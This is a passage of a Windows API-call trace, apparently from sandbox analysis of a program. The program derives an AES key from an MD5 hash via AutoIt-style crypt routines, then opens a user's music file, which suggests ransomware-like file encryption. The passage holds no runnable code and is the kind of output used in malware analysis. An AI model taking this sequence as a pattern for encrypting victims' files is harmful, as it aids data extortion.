Size=0x20) returned 0x7b18c8 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0037.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a885f0, ftCreationTime.dwHighDateTime=0x1d5bfd6, ftLastAccessTime.dwLowDateTime=0xf32dd8d0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0xf32dd8d0, ftLastWriteTime.dwHighDateTime=0x1d5c53e, nFileSizeHigh=0x0, nFileSizeLow=0x2ddd, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="z7Rh4U-493ioKt.m4a", cAlternateFileName="Z7RH4U~1.M4A")) returned 0x7c2100 [0037.825] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.826] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.826] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.826] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.826] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.826] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.827] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.827] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.827] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.827] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.827] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.827] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.828] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.828] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.828] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.828] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.828] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.828] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.829] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.829] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.829] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.829] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.829] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.829] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.829] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.829] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.829] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.829] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.829] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.829] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.829] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.830] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.830] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.830] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.830] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.830] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.830] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.830] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.830] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.830] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.831] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0037.831] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.831] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0037.831] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.831] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0037.831] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.831] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0037.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0037.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.832] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.832] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.832] CryptDestroyHash (hHash=0x7c2240) returned 1 [0037.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\z7rh4u-493iokt.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.832] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.832] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.833] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0037.833] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) 